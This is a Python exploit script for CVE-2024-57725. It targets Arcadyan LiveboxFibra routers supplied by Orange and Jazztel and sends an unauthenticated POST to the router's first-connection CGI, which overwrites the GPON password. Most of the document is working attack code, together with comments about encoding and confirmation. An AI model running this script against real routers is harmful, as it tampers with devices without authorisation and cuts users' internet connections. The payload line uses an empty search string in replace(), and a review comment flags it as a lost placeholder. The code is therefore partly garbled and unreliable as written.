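#!/usr/bin/python3
#
# Exploit Title: GPON Link Manipulation Vulnerability in Arcadyan Routers (Distributed by Orange and Jazztel)
# Date: 01/14/2025
# Exploit Author: pointedsec
# Vendor Homepage: https://www.arcadyan.com
# Affected ISPs: Orange and Jazztel (Spain)
# Tested on: Arcadyan routers distributed by Orange and Jazztel - LiveboxFibra (PRV3399B_B_LT)
# CVE: CVE-2024-57725
#
import base64
import sys

# Target and value settings used by main(); edit these before running.
ROUTER_IP = "192.168.1.1"
CHANGE_ONT_PATH = "/firstconnection.cgi"
GPON_NEW_PASSWORD = "a"
HEX_PADDING = 20  # width, in hex characters, of the padded value


def text_to_padded_hex(text: str, total_chars: int) -> str:
    """Return *text* as hex, left-padded with zeros to *total_chars* characters.

    The text is UTF-8 encoded and rendered as lowercase hex digits.

    Raises:
        ValueError: if the hex form is already longer than *total_chars*.
    """
    hex_value = text.encode("utf-8").hex()
    if len(hex_value) > total_chars:
        raise ValueError("El texto en hexadecimal supera el número de caracteres deseado.")
    return hex_value.rjust(total_chars, "0")


def user_confirmed(answer: str) -> bool:
    """Return True only for the exact answer "yes".

    Both prompts in this script guard a change that breaks connectivity, so
    anything other than an explicit "yes" (empty input, a typo, "y") counts as
    a refusal.
    """
    return answer == "yes"


def main():
    """Build the form body and POST it to the router's first-connection CGI.

    The request goes over plain HTTP and, as written here, carries only a
    Content-Type header: no cookie or credential is attached. An HTTP 200 only
    shows that the router answered; the success message itself tells the user
    to verify the result with check_ont_value.py.
    """
    # Imported here so the encoding helper can be imported and tested on a
    # machine that does not have the HTTP client installed.
    import requests

    data = "GO=firstconnection.htm&pws=&GO=firstconnection.htm"
    headers = {
        'Content-Type': 'text/plain;charset=UTF-8'
    }

    # Convert necessary data: value -> zero-padded hex -> base64 of that hex text
    padded_hex = text_to_padded_hex(GPON_NEW_PASSWORD, HEX_PADDING)
    base64_value = base64.b64encode(padded_hex.encode("utf-8")).decode("utf-8")
    print("[i] Padded hex: %s ; base64 value: %s" % (padded_hex, base64_value))

    # Extra confirmation. Fail closed: the original only stopped on a literal
    # "no", so a blank line or a typo went straight on to the change.
    confirm = input("[i] This will change your liveboxfibra GPON password and will cause connectivity issues, make sure you've got the original GPON password, want to proceed? (yes or no): ")
    if not user_confirmed(confirm):
        print("[i] Exiting...")
        sys.exit(0)

    # Change GPON Password
    # NOTE(review): as listed, the search string is empty, so str.replace()
    # inserts the value between every character of the template instead of
    # into a single field. The placeholder token was presumably lost when the
    # page was extracted; the statement is left as found.
    payload = data.replace("", base64_value)
    r = requests.post("http://" + ROUTER_IP + CHANGE_ONT_PATH, headers=headers, data=payload)
    if r.status_code == 200:
        print("[i] GPON Password Changed! Wait a few seconds and check the new password with check_ont_value.py")


if __name__ == "__main__":
    confirm = input("[i] Are you sure? This would cause connectivity issues, first backup the GPON password (yes or no): ")
    if user_confirmed(confirm):
        main()
    else:
        print("[i] Exiting...")
        sys.exit(0)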